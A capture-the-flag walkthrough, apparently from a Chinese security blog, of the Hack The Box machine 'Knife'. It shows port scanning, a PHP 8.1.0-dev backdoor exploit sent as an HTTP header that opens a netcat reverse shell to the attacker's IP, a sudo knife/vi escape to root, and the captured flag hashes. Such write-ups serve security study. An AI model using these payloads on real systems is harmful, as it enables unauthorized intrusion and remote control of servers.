Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.10.242 | TCP:22,80 |
$ ip='10.10.10.242'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be549ca367c315c364717f6a534a4c21 (RSA)
| 256 bf8a3fd406e92e874ec97eab220ec0ee (ECDSA)
|_ 256 1adea1cc37ce53bb1bfb2b0badb3f684 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
PHP 8.1.0-dev RCE
http://10.10.10.242/
![[Meachines] [Easy] Knife PHP 8.1.0-dev RCE+knife权限提升插图](https://img.4awl.net/img/5d/ceebc8f420d80913e9c4a6cb2d89ee.jpg "[Meachines] [Easy] Knife PHP 8.1.0-dev RCE+knife权限提升插图")
$ whatweb http://10.10.10.242/ -v
![[Meachines] [Easy] Knife PHP 8.1.0-dev RCE+knife权限提升插图1](https://img.4awl.net/img/20/b35c82754c20218d9f9ca8b855be33.jpg "[Meachines] [Easy] Knife PHP 8.1.0-dev RCE+knife权限提升插图1")
https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
![[Meachines] [Easy] Knife PHP 8.1.0-dev RCE+knife权限提升插图2](https://img.4awl.net/img/b4/97cccffd4428e7927970ca468b27f5.jpg "[Meachines] [Easy] Knife PHP 8.1.0-dev RCE+knife权限提升插图2")
GET / HTTP/1.1
Host: 10.10.10.242
User-Agentt: zerodiumsystem('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.33 10033 >/tmp/f');
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
![[Meachines] [Easy] Knife PHP 8.1.0-dev RCE+knife权限提升插图3](https://img.4awl.net/img/f7/96c625cbd5c6f2b976d2a8e1f8bd1d.jpg "[Meachines] [Easy] Knife PHP 8.1.0-dev RCE+knife权限提升插图3")
User.txt
80543f47be4ae1c71bee32030493ec4d
Privilege Escalation:knife
![[Meachines] [Easy] Knife PHP 8.1.0-dev RCE+knife权限提升插图4](https://img.4awl.net/img/ba/f576d50e153c19b822f56dda13b0e2.jpg "[Meachines] [Easy] Knife PHP 8.1.0-dev RCE+knife权限提升插图4")
Knife 是 Chef 配置管理工具的命令行接口(CLI)。Chef 是一个用于自动化服务器配置管理的工具,而 Knife 允许用户与 Chef Server 交互,管理节点、数据包、Cookbook 等。
$ sudo /usr/bin/knife data bag create 1 2 -e vi
:!/bin/bash
![[Meachines] [Easy] Knife PHP 8.1.0-dev RCE+knife权限提升插图5](https://img.4awl.net/img/8c/52ad3488d99e38684b2649ecc926f3.jpg "[Meachines] [Easy] Knife PHP 8.1.0-dev RCE+knife权限提升插图5")
![[Meachines] [Easy] Knife PHP 8.1.0-dev RCE+knife权限提升插图6](https://img.4awl.net/img/29/040b25158335382e67a628d656fc16.jpg "[Meachines] [Easy] Knife PHP 8.1.0-dev RCE+knife权限提升插图6")
Root.txt
15153b6892739327c25a62b7461a5315
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
